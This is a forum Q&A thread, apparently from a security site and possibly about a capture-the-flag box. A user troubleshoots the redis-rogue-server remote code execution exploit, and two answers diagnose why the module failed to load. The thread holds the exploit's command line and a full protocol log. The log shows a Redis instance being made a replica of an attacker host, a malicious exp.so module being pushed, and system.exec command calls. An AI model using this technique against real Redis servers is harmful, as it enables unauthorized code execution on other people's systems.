Redis Server Exploit for command execution

Question

I am new to this forum and looking for some help to understand this exploit. I am trying to check command execution on a vulnerable Redis server.

Following this document, I am able to exploit a Redis server but I am not able to type in any commands i.e. not giving me output. I see OK printed on a command prompt of the server. Anything I am missing here or the commands need to be executed differently on this shell:

https://medium.com/@knownsec404team/rce-exploits-of-redis-based-on-master-slave-replication-ef7a664ce1d0

root/redis-rogue-server# python3 redis-rogue-server.py --rhost 10.10.10.11 --rport 6379 --lhost 10.10.10.10 --lport 21001
TARGET 10.10.10.11:6379
SERVER 10.10.10.10:21001
[<-] b'*3\r\n$7\r\nSLAVEOF\r\n$13\r\n10.10.10.10\r\n$5\r\n21001\r\n'
[->] b'+OK\r\n'
[<-] b'*4\r\n$6\r\nCONFIG\r\n$3\r\nSET\r\n$10\r\ndbfilename\r\n$6\r\nexp.so\r\n'
[->] b'+OK\r\n'
[->] b'PING\r\n'
[<-] b'+PONG\r\n'
[->] b'REPLCONF listening-port 6379\r\n'
[<-] b'+OK\r\n'
[->] b'REPLCONF capa eof\r\n'
[<-] b'+OK\r\n'
[->] b'PSYNC ? -1\r\n'
[<-] b'+FULLRESYNC ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ 1\r\n$48560\r\n\x7fELF\x02\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00'......b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd9\xb6\x00\x00\x00\x00\x00\x00\xd3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\r\n'
[<-] b'*3\r\n$6\r\nMODULE\r\n$4\r\nLOAD\r\n$8\r\n./exp.so\r\n'
[->] b"-ERR unknown command 'MODULE'\r\n"
[<-] b'*3\r\n$7\r\nSLAVEOF\r\n$2\r\nNO\r\n$3\r\nONE\r\n'
[->] b'+OK\r\n'
[<<] whoami
[<-] b'*2\r\n$11\r\nsystem.exec\r\n$6\r\nwhoami\r\n'
[<<] ifconfig
[<-] b'*2\r\n$11\r\nsystem.exec\r\n$8\r\nifconfig\r\n'
[->] b"-ERR unknown command 'system.exec'\r\n"

I see “OK” at the server console and typing those (or any arbitrary)commands cause server to reboot (within 1,2 minutes but always). — Sophia, Jun 15 '20 at 20:42

score 0 · Answer 1 · answered Mar 16 '21 at 10:35

0

Looks like the module failed to be load. Check your .so file, Seems the same I have met, due to the arch of my build machine is x86 and the target server running redis is x86_64 linux and it has not install x86 library by default.

answered Mar 16 '21 at 10:35

Cherry CEN

1

score 0 · Answer 2 · answered Sep 30 '21 at 13:23

The redis instance doesn't have MODULE command which is odd. If this is a CTF it might be intentional that the box creator removed it.

[<-] b'*3\r\n$6\r\nMODULE\r\n$4\r\nLOAD\r\n$8\r\n./exp.so\r\n' [->] b"-ERR unknown command 'MODULE'\r\n"

That's why the actual module was not loaded into the redis server.

[->] b"-ERR unknown command 'system.exec'\r\n"

Redis Server Exploit for command execution

2 Answers2